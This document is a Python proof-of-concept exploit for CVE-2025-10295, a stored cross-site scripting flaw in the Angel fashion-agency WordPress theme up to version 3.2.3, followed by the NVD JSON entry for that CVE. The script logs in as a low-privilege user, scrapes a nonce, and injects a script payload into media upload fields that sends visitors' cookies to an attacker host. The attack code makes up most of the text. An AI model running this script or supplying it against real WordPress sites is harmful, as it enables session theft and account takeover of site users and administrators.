CVE-2025-10295

import requests import re # CVE-2025-10295 PoC - Stored XSS in Angel WordPress Theme # Target: Angel - Fashion Model Agency WordPress CMS Theme <= 3.2.3 TARGET_URL = "http://target-wordpress-site.com" USERNAME = "attacker_account" PASSWORD = "attacker_password" def exploit_stored_xss(): """ This PoC demonstrates the stored XSS vulnerability in the profile media uploader. Steps: 1. Login to WordPress with subscriber+ account 2. Access profile edit form with media upload option 3. Inject XSS payload in media file metadata 4. When admin/user views the profile, XSS executes """ session = requests.Session() # Step 1: Login to WordPress login_url = f"{TARGET_URL}/wp-login.php" login_data = { 'log': USERNAME, 'pwd': PASSWORD, 'wp-submit': 'Log In', 'redirect_to': f"{TARGET_URL}/wp-admin/", 'testcookie': '1' } response = session.post(login_url, data=login_data) if 'wordpress_logged_in' not in session.cookies.get_dict(): print("[-] Login failed") return False print("[+] Login successful") # Step 2: Access profile edit page profile_url = f"{TARGET_URL}/wp-admin/profile.php" response = session.get(profile_url) # Step 3: XSS Payload - Stored in media uploader field # The payload will be stored and executed on page load xss_payload = '<script>fetch("https://attacker.com/steal?c="+document.cookie)</script>' # Step 4: Submit profile with XSS in media upload field # This typically involves uploading a file with crafted metadata # or filling form fields that are not properly sanitized profile_update_url = f"{TARGET_URL}/wp-admin/admin-ajax.php" # Craft the malicious request files = { 'Filedata': ('malicious_file.jpg', b'fake_image_data', 'image/jpeg') } data = { 'action': 'upload_attachment', 'post_id': '0', '_wpnonce': re.search(r'name="_wpnonce" value="([a-z0-9]+)"', response.text).group(1) if re.search(r'name="_wpnonce" value="([a-z0-9]+)"', response.text) else '', # XSS payload injected in fields that are not sanitized 'post_title': xss_payload, 'post_content': '', 'alt': xss_payload, 'desc': xss_payload } response = session.post(profile_update_url, data=data, files=files) if response.status_code == 200: print("[+] XSS payload injected successfully") print(f"[+] Payload: {xss_payload}") print("[+] The XSS will execute when anyone views the affected profile page") return True else: print("[-] Failed to inject payload") return False if __name__ == "__main__": exploit_stored_xss()

{"cve": {"id": "CVE-2025-10295", "sourceIdentifier": "[email protected]", "published": "2025-11-13T09:15:45.570", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The Angel – Fashion Model Agency WordPress CMS Theme theme for WordPress is vulnerable to Stored Cross-Site Scripting the profile media uploader in all versions up to, and including, 3.2.3 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with subscriber-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. This requires the user has access to the edit profile form with the media upload option."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N", "baseScore": 6.4, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.1, "impactScore": 2.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-79"}]}], "references": [{"url": "https://themeforest.net/item/angel-fashion-model-agency-wordpress-cms-theme/4251413", "source": "[email protected]"}, {"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/ab747c34-219d-40c8-a73d-5b0dffba003b?source=cve", "source": "[email protected]"}]}}